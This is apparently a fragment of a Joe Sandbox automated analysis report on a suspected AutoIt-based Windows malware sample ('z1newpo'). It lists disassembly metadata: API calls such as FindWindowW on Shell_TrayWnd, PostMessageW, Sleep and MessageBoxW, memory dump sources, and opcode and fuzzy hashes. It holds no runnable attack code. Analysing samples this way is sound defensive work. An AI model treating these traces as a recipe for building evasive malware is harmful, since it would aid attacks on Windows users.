                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D